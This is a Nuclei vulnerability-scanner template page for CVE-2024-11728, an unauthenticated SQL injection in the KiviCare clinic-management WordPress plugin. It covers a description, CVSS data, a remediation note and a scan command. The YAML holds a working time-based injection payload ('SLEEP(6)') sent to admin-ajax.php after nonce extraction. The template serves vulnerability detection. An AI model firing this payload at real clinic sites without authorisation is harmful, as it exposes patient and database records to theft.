KiviCare Clinic & Patient Management System (EHR) <= 3.6.4 - SQL Injection
ID: CVE-2024-11728
Severity: high
Author: samogod,s4e-io
Tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,kivicare-clinic-management-system
Description
Section titled “Description”The KiviCare Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the ‘visit_type[service_id]’ parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
YAML Source
Section titled “YAML Source”id: CVE-2024-11728
info: name: KiviCare Clinic & Patient Management System (EHR) <= 3.6.4 - SQL Injection author: samogod,s4e-io severity: high description: | The KiviCare Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: | To remediate this vulnerability, validate and sanitize all user inputs on the server side before using them in SQL queries. Use prepared statements or stored procedures, and ensure that data is properly escaped. reference: - https://github.com/samogod/CVE-2024-11728 - https://samogod.com/2024/12/11/cve-2024-11728-kivicare-wordpress-unauthenticated-sql-injection/ - https://plugins.trac.wordpress.org/changeset/3201428/kivicare-clinic-management-system/trunk/app/controllers/KCTaxController.php - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=cve - https://nvd.nist.gov/vuln/detail/CVE-2024-11728 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-11728 cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.10812 metadata: verified: true max-request: 2 vendor: iqonic product: kivicare framework: wordpress fofa-query: body="/wp-content/plugins/kivicare-clinic-management-system" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,kivicare-clinic-management-system
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body words: - "/wp-content/plugins/kivicare-clinic-management-system" internal: true
extractors: - type: regex name: nonce group: 1 regex: - "ajax_post_nonce:\\s*'([^']+)'" internal: true
- raw: - | @timeout 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=ajax_post&route_name=tax_calculated_data&clinic_id[id]=1&doctor_id[id]=1&visit_type[0][service_id]=123) AND (SELECT * FROM (SELECT(SLEEP(6)))alias) AND (1=1&_ajax_nonce={{nonce}}
matchers: - type: dsl dsl: - 'duration>6' - 'contains_all(body, "status", "message", "total_tax")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and# digest: 4a0a00473045022027479eb161be6b0fccdb604c9d0934107aa11b6d79d59001b8e9cc1792830c0e022100a78584ad4ec197d607509afd18b258faae1e7b5d52d85ef1b87206594f96e114:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-11728.yaml"